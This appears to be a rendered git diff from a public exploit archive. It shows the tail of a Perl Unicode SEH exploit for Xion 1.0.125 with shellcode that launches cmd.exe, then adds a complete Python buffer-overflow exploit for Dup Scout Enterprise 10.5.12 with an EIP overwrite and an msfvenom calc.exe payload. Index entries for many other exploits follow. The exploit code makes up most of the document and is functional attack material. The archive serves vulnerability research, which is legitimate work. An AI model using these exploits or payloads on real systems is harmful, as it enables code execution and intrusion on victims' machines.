||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\xf8\x41"; # mov edx, 4100f800
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.10] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\xb8\x41"; # mov edx, 4100b800
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.11] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x49\x41"; # mov edx, 41004900
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x4A\x41"; # mov edx, 41004A00
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.12] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\x77\x41"; # mov edx, 41007700
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [2.13] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
$crash .= "\xC8"; # add al, cl # eq eax + 2
|
||||
$crash .= $NOP1; # NOP-eq
|
||||
$crash .= "\xba\xd0\x41"; # mov edx, 4100d000
|
||||
$crash .= "\x30"; # add [eax],dh
|
||||
|
||||
# [3] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # -4: one more NOP below # -8: sizeof(SEHframe)
|
||||
# *2: for UTF-16 # /4: 2 for UTF-16 and 2 for the 2-byte-NOP
|
||||
$crash .= $NOP2 x (($suboffset - 4 - 8 - (length($crash)*2 - $offset_to_payload*2))/4); # NOP-eq + pop ecx
|
||||
$crash .= $NOP1."\x6A"; # NOP1 + NOP1-eq (push 0)
|
||||
|
||||
|
||||
# [4] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ shellcode. left - ^jalousie; right - actual shellcode that will be crafted. CMD=cmd.exe
|
||||
my $shellcode =
|
||||
"\x50". # "\x8b". # # BAD BYTE
|
||||
# "\xec". # 0
|
||||
"\x55". # "\x55".
|
||||
# "\x8b". # 0 # BAD BYTE
|
||||
"\xec". # "\xec".
|
||||
# "\x68". # 0
|
||||
"\x65". # "\x65".
|
||||
# "\x78". # 0
|
||||
"\x65". # "\x65".
|
||||
# "\x2F". # 0
|
||||
"\x68". # "\x68".
|
||||
# "\x63". # 0
|
||||
"\x6d". # "\x6d".
|
||||
# "\x64". # 0
|
||||
"\x2e". # "\x2e".
|
||||
# "\x8d". # 0
|
||||
"\x45". # "\x45".
|
||||
# "\xf8". # 0
|
||||
"\x50". # "\x50".
|
||||
# "\xb8". # 0
|
||||
"\xc7". # "\xc7".
|
||||
# "\x93". # 0 # BAD BYTE
|
||||
"\xc2". # "\xc2".
|
||||
# "\x77". # 0
|
||||
"\xff"; # "\xff".
|
||||
# "\xd0"; # 0
|
||||
|
||||
$crash .= $shellcode;
|
||||
|
||||
$crash .= "C" x ($buffer_length - length($crash));
|
||||
open(myfile, ">$path");
|
||||
print myfile $crash;
|
70
exploits/windows/local/44244.py
Executable file
70
exploits/windows/local/44244.py
Executable file
|
@ -0,0 +1,70 @@
|
|||
#!/usr/bin/python
|
||||
|
||||
#
|
||||
# Exploit Author: bzyo
|
||||
# Twitter: @bzyo_
|
||||
# Exploit Title: Dup Scout Enterprise 10.5.12 - Local Buffer Overflow
|
||||
# Date: 02-22-2018
|
||||
# Vulnerable Software: Dup Scout Enterprise v10.5.12
|
||||
# Vendor Homepage: http://www.dupscout.com
|
||||
# Version: 10.5.12
|
||||
# Software Link: http://www.dupscout.com/downloads.html
|
||||
# Tested On: Windows 7 x86
|
||||
#
|
||||
# bad chars \x00\x0a and everything above \x80
|
||||
#
|
||||
# PoC:
|
||||
# 1. generate dupscout.txt, copy contents to clipboard
|
||||
# 2. open app, select Server, select Connect
|
||||
# 3. type anything into Share Name, paste dupscout.txt contents into User Name
|
||||
# 4. select Connect and then OK
|
||||
# 5. pop calc
|
||||
#
|
||||
|
||||
filename="dupscout.txt"
|
||||
|
||||
junk = "A"*792
|
||||
|
||||
#0x10021144 : push esp # ret | ascii {PAGE_EXECUTE_READ} [libspg.dll]
|
||||
eip = "\x44\x11\x02\x10"
|
||||
|
||||
fill = "\x43"*560
|
||||
|
||||
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=ESP -f c
|
||||
#Payload size: 440 bytes
|
||||
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
|
||||
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
|
||||
"\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6b\x58\x6b\x32\x53\x30"
|
||||
"\x57\x70\x67\x70\x53\x50\x4e\x69\x39\x75\x54\x71\x39\x50\x61"
|
||||
"\x74\x6c\x4b\x66\x30\x44\x70\x6c\x4b\x73\x62\x46\x6c\x6e\x6b"
|
||||
"\x66\x32\x66\x74\x4e\x6b\x62\x52\x65\x78\x44\x4f\x78\x37\x72"
|
||||
"\x6a\x46\x46\x44\x71\x6b\x4f\x4c\x6c\x57\x4c\x53\x51\x51\x6c"
|
||||
"\x47\x72\x34\x6c\x47\x50\x69\x51\x6a\x6f\x64\x4d\x37\x71\x59"
|
||||
"\x57\x6d\x32\x5a\x52\x51\x42\x61\x47\x4e\x6b\x36\x32\x44\x50"
|
||||
"\x6c\x4b\x73\x7a\x55\x6c\x4c\x4b\x42\x6c\x52\x31\x63\x48\x6d"
|
||||
"\x33\x32\x68\x43\x31\x5a\x71\x53\x61\x6c\x4b\x36\x39\x31\x30"
|
||||
"\x73\x31\x4e\x33\x4c\x4b\x50\x49\x65\x48\x39\x73\x46\x5a\x37"
|
||||
"\x39\x4e\x6b\x64\x74\x4e\x6b\x63\x31\x78\x56\x35\x61\x6b\x4f"
|
||||
"\x6e\x4c\x39\x51\x7a\x6f\x46\x6d\x63\x31\x4b\x77\x50\x38\x6d"
|
||||
"\x30\x32\x55\x79\x66\x35\x53\x71\x6d\x78\x78\x57\x4b\x61\x6d"
|
||||
"\x35\x74\x70\x75\x69\x74\x30\x58\x4c\x4b\x30\x58\x31\x34\x75"
|
||||
"\x51\x69\x43\x70\x66\x4c\x4b\x44\x4c\x50\x4b\x6c\x4b\x42\x78"
|
||||
"\x75\x4c\x76\x61\x4e\x33\x4e\x6b\x57\x74\x4e\x6b\x55\x51\x6a"
|
||||
"\x70\x4d\x59\x67\x34\x67\x54\x77\x54\x63\x6b\x53\x6b\x33\x51"
|
||||
"\x42\x79\x73\x6a\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x42"
|
||||
"\x7a\x6e\x6b\x34\x52\x58\x6b\x6e\x6d\x61\x4d\x62\x4a\x35\x51"
|
||||
"\x4c\x4d\x4f\x75\x4f\x42\x73\x30\x33\x30\x63\x30\x46\x30\x42"
|
||||
"\x48\x45\x61\x6e\x6b\x52\x4f\x4d\x57\x6b\x4f\x4a\x75\x4d\x6b"
|
||||
"\x4c\x30\x58\x35\x39\x32\x51\x46\x51\x78\x49\x36\x4a\x35\x6f"
|
||||
"\x4d\x4d\x4d\x59\x6f\x4a\x75\x55\x6c\x54\x46\x31\x6c\x65\x5a"
|
||||
"\x6d\x50\x59\x6b\x49\x70\x31\x65\x37\x75\x4f\x4b\x73\x77\x62"
|
||||
"\x33\x62\x52\x52\x4f\x53\x5a\x73\x30\x76\x33\x79\x6f\x68\x55"
|
||||
"\x62\x43\x70\x61\x42\x4c\x35\x33\x76\x4e\x53\x55\x30\x78\x43"
|
||||
"\x55\x43\x30\x41\x41")
|
||||
|
||||
buffer = junk + eip + calc + fill
|
||||
|
||||
textfile = open(filename , 'w')
|
||||
textfile.write(buffer)
|
||||
textfile.close()
|
|
@ -5888,6 +5888,8 @@ id,file,description,date,author,type,platform,port
|
|||
44235,exploits/macos/dos/44235.c,"Apple macOS Sierra 10.12.1 - 'IOFireWireFamily' FireWire Port Denial of Service",2017-08-19,"Brandon Azad",dos,macos,
|
||||
44238,exploits/osx/dos/44238.c,"Apple OS X Yosemite - 'flow_divert-heap-overflow' Kernel Panic",2017-01-10,"Brandon Azad",dos,osx,
|
||||
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
|
||||
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
|
||||
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -9566,6 +9568,9 @@ id,file,description,date,author,type,platform,port
|
|||
44234,exploits/macos/local/44234.c,"Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak",2017-12-07,"Brandon Azad",local,macos,
|
||||
44237,exploits/macos/local/44237.md,"Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation",2017-01-16,"Brandon Azad",local,macos,
|
||||
44239,exploits/osx/local/44239.md,"Apple OS X 10.10.5 - 'rootsh' Local Privilege Escalation",2016-05-16,"Brandon Azad",local,osx,
|
||||
44243,exploits/windows/local/44243.pl,"Xion 1.0.125 - '.m3u' Local SEH-Based Unicode Venetian Exploit",2018-03-05,synthetic,local,windows,
|
||||
44244,exploits/windows/local/44244.py,"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow",2018-03-05,bzyo,local,windows,
|
||||
44246,exploits/linux/local/44246.txt,"Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation",2018-03-05,KoreLogic,local,linux,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -16292,6 +16297,8 @@ id,file,description,date,author,type,platform,port
|
|||
44227,exploits/php/remote/44227.php,"Joomla! 3.7 - SQL Injection",2017-07-04,"Manish Tanwar",remote,php,
|
||||
44228,exploits/php/remote/44228.php,"Posnic Stock Management System - SQL Injection",2017-02-03,"Manish Tanwar",remote,php,
|
||||
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
|
||||
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
|
||||
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -38557,7 +38564,7 @@ id,file,description,date,author,type,platform,port
|
|||
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
|
||||
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
|
||||
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
|
||||
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
|
||||
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
|
||||
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
|
||||
|
@ -38952,4 +38959,6 @@ id,file,description,date,author,type,platform,port
|
|||
44216,exploits/perl/webapps/44216.txt,"Routers2 2.24 - Cross-Site Scripting",2018-02-28,"Lorenzo Di Fuccia",webapps,perl,
|
||||
44219,exploits/hardware/webapps/44219.txt,"D-Link DIR-600M Wireless - Cross-Site Scripting",2018-03-02,"Prasenjit Kanti Paul",webapps,hardware,
|
||||
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
|
||||
442321,exploits/windows/webapps/442321.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
|
||||
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
|
||||
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
|
||||
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue